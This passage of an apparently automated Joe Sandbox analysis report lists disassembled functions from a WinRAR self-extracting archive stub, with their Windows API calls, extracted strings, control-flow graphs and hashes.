                                                                  • Instruction Fuzzy Hash: 46E04F31000244ABCF016F10CD09A8A3F69EB10786B408869F8098A232CB39DE91CB88
                                                                  Function 0045848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 79bb3698fe988f6169101c6697bfeaf4222bac0d44b036a8814d7ca22b235de4
                                                                  • Instruction ID: 3ac4ad068ecdfafb070f02e5ac336df28a2f74c47c7b667a676ea20fc162ecfe
                                                                  • Opcode Fuzzy Hash: 79bb3698fe988f6169101c6697bfeaf4222bac0d44b036a8814d7ca22b235de4
                                                                  • Instruction Fuzzy Hash: 1682F771904145AEDF15DB60C881BFAB7B9AF05305F0841BFEC49AB243DF285A8CCB69
                                                                  Function 0046B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0046B7E5
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046B8D1
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B8EF
                                                                  • IsDialogMessageW.USER32(?,?), ref: 0046B902
                                                                  • TranslateMessage.USER32(?), ref: 0046B910
                                                                  • DispatchMessageW.USER32(?), ref: 0046B91A
                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0046B93D
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0046B960
                                                                  • GetDlgItem.USER32(?,00000068), ref: 0046B983
                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0046B99E
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,004835F4), ref: 0046B9B1
                                                                    • Part of subcall function 0046D453: _wcschr.LIBVCRUNTIME ref: 0046D45C
                                                                    • Part of subcall function 0046D453: _wcslen.LIBCMT ref: 0046D47D
                                                                  • SetFocus.USER32(00000000), ref: 0046B9B8
                                                                  • _swprintf.LIBCMT ref: 0046BA24
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                    • Part of subcall function 0046D4D4: GetDlgItem.USER32(00000068,004AFCB8), ref: 0046D4E8
                                                                    • Part of subcall function 0046D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0046AF07,00000001,?,?,0046B7B9,0048506C,004AFCB8,004AFCB8,00001000,00000000,00000000), ref: 0046D510
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0046D51B
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004835F4), ref: 0046D529
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0046D53F
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0046D559
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0046D59D
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0046D5AB
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0046D5BA
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0046D5E1
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004843F4), ref: 0046D5F0
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0046BA68
                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0046BA90
                                                                  • GetTickCount.KERNEL32 ref: 0046BAAE
                                                                  • _swprintf.LIBCMT ref: 0046BAC2
                                                                  • GetLastError.KERNEL32(?,00000011), ref: 0046BAF4
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0046BB43
                                                                  • _swprintf.LIBCMT ref: 0046BB7C
                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0046BBD0
                                                                  • GetCommandLineW.KERNEL32 ref: 0046BBEA
                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0046BC47
                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0046BC6F
                                                                  • Sleep.KERNEL32(00000064), ref: 0046BCB9
                                                                  • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0046BCE2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0046BCEB
                                                                  • _swprintf.LIBCMT ref: 0046BD1E
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046BD7D
                                                                  • SetDlgItemTextW.USER32(?,00000065,004835F4), ref: 0046BD94
                                                                  • GetDlgItem.USER32(?,00000065), ref: 0046BD9D
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0046BDAC
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0046BDBB
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046BE68
                                                                  • _wcslen.LIBCMT ref: 0046BEBE
                                                                  • _swprintf.LIBCMT ref: 0046BEE8
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0046BF32
                                                                  • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0046BF4C
                                                                  • GetDlgItem.USER32(?,00000068), ref: 0046BF55
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0046BF6B
                                                                  • GetDlgItem.USER32(?,00000066), ref: 0046BF85
                                                                  • SetWindowTextW.USER32(00000000,0049A472), ref: 0046BFA7
                                                                  • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0046C007
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046C01A
                                                                  • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0046C0BD
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0046C197
                                                                  • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0046C1D9
                                                                    • Part of subcall function 0046C73F: __EH_prolog.LIBCMT ref: 0046C744
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046C1FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                  • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDGu<F$STARTDLG$^F$__tmp_rar_sfx_access_check_%u$hF$winrarsfxmappingfile.tmp$QH
                                                                  • API String ID: 3829768659-2819455000
                                                                  • Opcode ID: 8a71a3b2dc8f6bd526f6478b247d251160c1839df8451690d1f84e402f8c3baf
                                                                  • Instruction ID: ffe63537c97dd6736b9249c63ff272fdb923572baa8d70e76299b2c073f710c1
                                                                  • Opcode Fuzzy Hash: 8a71a3b2dc8f6bd526f6478b247d251160c1839df8451690d1f84e402f8c3baf
                                                                  • Instruction Fuzzy Hash: BF420871940244BAEB21ABA59C49FBF376CAB12705F00017BF540E61D2EB7D5A48CB6E
                                                                  Function 00460863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 269 460863-460886 call 46ec50 GetModuleHandleW 272 4608e7-460b48 269->272 273 460888-46089f GetProcAddress 269->273 274 460c14-460c40 GetModuleFileNameW call 45c29a call 460602 272->274 275 460b4e-460b59 call 4775fb 272->275 276 4608a1-4608b7 273->276 277 4608b9-4608c9 GetProcAddress 273->277 291 460c42-460c4e call 45b146 274->291 275->274 286 460b5f-460b8d GetModuleFileNameW CreateFileW 275->286 276->277 279 4608e5 277->279 280 4608cb-4608e0 277->280 279->272 280->279 289 460b8f-460b9b SetFilePointer 286->289 290 460c08-460c0f CloseHandle 286->290 289->290 292 460b9d-460bb9 ReadFile 289->292 290->274 298 460c50-460c5b call 46081b 291->298 299 460c7d-460ca4 call 45c310 GetFileAttributesW 291->299 292->290 295 460bbb-460be0 292->295 297 460bfd-460c06 call 460371 295->297 297->290 306 460be2-460bfc call 46081b 297->306 298->299 308 460c5d-460c7b CompareStringW 298->308 309 460ca6-460caa 299->309 310 460cae 299->310 306->297 308->299 308->309 309->291 313 460cac 309->313 311 460cb0-460cb5 310->311 314 460cb7 311->314 315 460cec-460cee 311->315 313->311 316 460cb9-460ce0 call 45c310 GetFileAttributesW 314->316 317 460cf4-460d0b call 45c2e4 call 45b146 315->317 318 460dfb-460e05 315->318 323 460ce2-460ce6 316->323 324 460cea 316->324 328 460d73-460da6 call 454092 AllocConsole 317->328 329 460d0d-460d6e call 46081b * 2 call 45e617 call 454092 call 45e617 call 46a7e4 317->329 323->316 326 460ce8 323->326 324->315 326->315 335 460df3-460df5 ExitProcess 328->335 336 460da8-460ded GetCurrentProcessId AttachConsole call 473e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->336 329->335 336->335
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 0046087C
                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0046088E
                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004608BF
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00460B69
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00460B83
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00460B93
                                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,|<H,00000000), ref: 00460BB1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00460C09
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00460C1E
                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<H,?,00000000,?,00000800), ref: 00460C72
                                                                  • GetFileAttributesW.KERNELBASE(?,?,|<H,00000800,?,00000000,?,00000800), ref: 00460C9C
                                                                  • GetFileAttributesW.KERNEL32(?,?,D=H,00000800), ref: 00460CD8
                                                                    • Part of subcall function 0046081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00460836
                                                                    • Part of subcall function 0046081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0045F2D8,Crypt32.dll,00000000,0045F35C,?,?,0045F33E,?,?,?), ref: 00460858
                                                                  • _swprintf.LIBCMT ref: 00460D4A
                                                                  • _swprintf.LIBCMT ref: 00460D96
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                  • AllocConsole.KERNEL32 ref: 00460D9E
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00460DA8
                                                                  • AttachConsole.KERNEL32(00000000), ref: 00460DAF
                                                                  • _wcslen.LIBCMT ref: 00460DC4
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00460DD5
                                                                  • WriteConsoleW.KERNEL32(00000000), ref: 00460DDC
                                                                  • Sleep.KERNEL32(00002710), ref: 00460DE7
                                                                  • FreeConsole.KERNEL32 ref: 00460DED
                                                                  • ExitProcess.KERNEL32 ref: 00460DF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                  • String ID: (=H$,<H$,@H$0?H$0AH$4BH$8>H$D=H$DXGIDebug.dll$H?H$H@H$HAH$P>H$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=H$`@H$d?H$dAH$dwmapi.dll$h=H$h>H$kernel32$uxtheme.dll$|<H$|?H$|@H$<H$>H$?H$@H$AH
                                                                  • API String ID: 1207345701-2028585871
                                                                  • Opcode ID: f059b76fb5ff43e86addbc698637cc6d1a4d58d52f0ef68fdd89db2b6650c041
                                                                  • Instruction ID: 74257efd24e1ec24357f4fb1cb5e945e83d979bd81b32090ddb29f2136f76871
                                                                  • Opcode Fuzzy Hash: f059b76fb5ff43e86addbc698637cc6d1a4d58d52f0ef68fdd89db2b6650c041
                                                                  • Instruction Fuzzy Hash: 90D174B1408345ABD321EF50C849B9FBBE8BB85B09F508D1FF68596250D7788648CB9F
                                                                  Function 0046C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 348 46c73f-46c757 call 46eb78 call 46ec50 353 46d40d-46d418 348->353 354 46c75d-46c787 call 46b314 348->354 354->353 357 46c78d-46c792 354->357 358 46c793-46c7a1 357->358 359 46c7a2-46c7b7 call 46af98 358->359 362 46c7b9 359->362 363 46c7bb-46c7d0 call 461fbb 362->363 366 46c7d2-46c7d6 363->366 367 46c7dd-46c7e0 363->367 366->363 368 46c7d8 366->368 369 46c7e6 367->369 370 46d3d9-46d404 call 46b314 367->370 368->370 371 46c9be-46c9c0 369->371 372 46ca5f-46ca61 369->372 373 46ca7c-46ca7e 369->373 374 46c7ed-46c7f0 369->374 370->358 381 46d40a-46d40c 370->381 371->370 378 46c9c6-46c9d2 371->378 372->370 376 46ca67-46ca77 SetWindowTextW 372->376 373->370 377 46ca84-46ca8b 373->377 374->370 379 46c7f6-46c850 call 46a64d call 45bdf3 call 45a544 call 45a67e call 456edb 374->379 376->370 377->370 382 46ca91-46caaa 377->382 383 46c9e6-46c9eb 378->383 384 46c9d4-46c9e5 call 477686 378->384 436 46c98f-46c9a4 call 45a5d1 379->436 381->353 386 46cab2-46cac0 call 473e13 382->386 387 46caac 382->387 390 46c9f5-46ca00 call 46b48e 383->390 391 46c9ed-46c9f3 383->391 384->383 386->370 404 46cac6-46cacf 386->404 387->386 395 46ca05-46ca07 390->395 391->395 398 46ca12-46ca32 call 473e13 call 473e3e 395->398 399 46ca09-46ca10 call 473e13 395->399 424 46ca34-46ca3b 398->424 425 46ca4b-46ca4d 398->425 399->398 408 46cad1-46cad5 404->408 409 46caf8-46cafb 404->409 413 46cb01-46cb04 408->413 415 46cad7-46cadf 408->415 412 46cbe0-46cbee call 460602 409->412 409->413 428 46cbf0-46cc04 call 47279b 412->428 417 46cb06-46cb0b 413->417 418 46cb11-46cb2c 413->418 415->370 421 46cae5-46caf3 call 460602 415->421 417->412 417->418 437 46cb76-46cb7d 418->437 438 46cb2e-46cb68 418->438 421->428 432 46ca42-46ca4a call 477686 424->432 433 46ca3d-46ca3f 424->433 425->370 427 46ca53-46ca5a call 473e2e 425->427 427->370 447 46cc06-46cc0a 428->447 448 46cc11-46cc62 call 460602 call 46b1be GetDlgItem SetWindowTextW SendMessageW call 473e49 428->448 432->425 433->432 454 46c855-46c869 SetFileAttributesW 436->454 455 46c9aa-46c9b9 call 45a55a 436->455 440 46cb7f-46cb97 call 473e13 437->440 441 46cbab-46cbce call 473e13 * 2 437->441 471 46cb6c-46cb6e 438->471 472 46cb6a 438->472 440->441 458 46cb99-46cba6 call 4605da 440->458 441->428 476 46cbd0-46cbde call 4605da 441->476 447->448 453 46cc0c-46cc0e 447->453 482 46cc67-46cc6b 448->482 453->448 459 46c90f-46c91f GetFileAttributesW 454->459 460 46c86f-46c8a2 call 45b991 call 45b690 call 473e13 454->460 455->370 458->441 459->436 469 46c921-46c930 DeleteFileW 459->469 492 46c8a4-46c8b3 call 473e13 460->492 493 46c8b5-46c8c3 call 45bdb4 460->493 469->436 475 46c932-46c935 469->475 471->437 472->471 479 46c939-46c965 call 454092 GetFileAttributesW 475->479 476->428 489 46c937-46c938 479->489 490 46c967-46c97d MoveFileW 479->490 482->370 486 46cc71-46cc85 SendMessageW 482->486 486->370 489->479 490->436 491 46c97f-46c989 MoveFileExW 490->491 491->436 492->493 498 46c8c9-46c908 call 473e13 call 46fff0 492->498 493->455 493->498 498->459
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0046C744
                                                                    • Part of subcall function 0046B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0046B3FB
                                                                    • Part of subcall function 0046AF98: _wcschr.LIBVCRUNTIME ref: 0046B033
                                                                  • _wcslen.LIBCMT ref: 0046CA0A
                                                                  • _wcslen.LIBCMT ref: 0046CA13
                                                                  • SetWindowTextW.USER32(?,?), ref: 0046CA71
                                                                  • _wcslen.LIBCMT ref: 0046CAB3
                                                                  • _wcsrchr.LIBVCRUNTIME ref: 0046CBFB
                                                                  • GetDlgItem.USER32(?,00000066), ref: 0046CC36
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0046CC46
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,0049A472), ref: 0046CC54
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046CC7F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                  • String ID: %s.%d.tmp$<br>$<F$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$F
                                                                  • API String ID: 986293930-2894835992
                                                                  • Opcode ID: 0c8f6d180224f1a2c03c1995b29abe96abe51f6621e9a2f5d07d2fcc6ac25aa8
                                                                  • Instruction ID: e49bb21a6590273b5ea2b09861dbde153b2237b940715fd06eda009f575b4ee9
                                                                  • Opcode Fuzzy Hash: 0c8f6d180224f1a2c03c1995b29abe96abe51f6621e9a2f5d07d2fcc6ac25aa8
                                                                  • Instruction Fuzzy Hash: B9E16672D00118AADB24DBA1DD85DEF73BCAB05315F0085ABF949E3140FB789E848F69
                                                                  Function 0045DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0045DA70
                                                                  • _wcschr.LIBVCRUNTIME ref: 0045DA91
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0045DAAC
                                                                    • Part of subcall function 0045C29A: _wcslen.LIBCMT ref: 0045C2A2
                                                                    • Part of subcall function 004605DA: _wcslen.LIBCMT ref: 004605E0
                                                                    • Part of subcall function 00461B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0045BAE9,00000000,?,?,?,00010424), ref: 00461BA0
                                                                  • _wcslen.LIBCMT ref: 0045DDE9
                                                                  • __fprintf_l.LIBCMT ref: 0045DF1C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9H
                                                                  • API String ID: 557298264-3298731444
                                                                  • Opcode ID: 895a16393c2716317bb3c418c0f33b00807cd0637a98b64454cba5c73b6c0261
                                                                  • Instruction ID: 652fb03228f9a53ef9b78239c925d37a1dc23b964df5480ed1b053465c96d95c
                                                                  • Opcode Fuzzy Hash: 895a16393c2716317bb3c418c0f33b00807cd0637a98b64454cba5c73b6c0261
                                                                  • Instruction Fuzzy Hash: 1932D071900218ABCF28EF65C841BEE77A5EF04705F40455BFD0697282EBB99E89CB58
                                                                  Function 0046D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0046B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046B579
                                                                    • Part of subcall function 0046B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B58A
                                                                    • Part of subcall function 0046B568: IsDialogMessageW.USER32(00010424,?), ref: 0046B59E
                                                                    • Part of subcall function 0046B568: TranslateMessage.USER32(?), ref: 0046B5AC
                                                                    • Part of subcall function 0046B568: DispatchMessageW.USER32(?), ref: 0046B5B6
                                                                  • GetDlgItem.USER32(00000068,004AFCB8), ref: 0046D4E8
                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,0046AF07,00000001,?,?,0046B7B9,0048506C,004AFCB8,004AFCB8,00001000,00000000,00000000), ref: 0046D510
                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0046D51B
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,004835F4), ref: 0046D529
                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0046D53F
                                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0046D559
                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0046D59D
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0046D5AB
                                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0046D5BA
                                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0046D5E1
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,004843F4), ref: 0046D5F0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                  • String ID: \
                                                                  • API String ID: 3569833718-2967466578
                                                                  • Opcode ID: e89083aa98f5d99d4f56d93e38672791fd80b63f0b91b0fb013aaf50808a5d8c
                                                                  • Instruction ID: 42c5ef6cc4768d7158177fcc60c33eb649628e9c853d855014504bdba617aef3
                                                                  • Opcode Fuzzy Hash: e89083aa98f5d99d4f56d93e38672791fd80b63f0b91b0fb013aaf50808a5d8c
                                                                  • Instruction Fuzzy Hash: 2131C171245342BBD301EF25DC4AFAB7FACEF82709F004629F55196190EB648A048BBE
                                                                  Function 0046D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
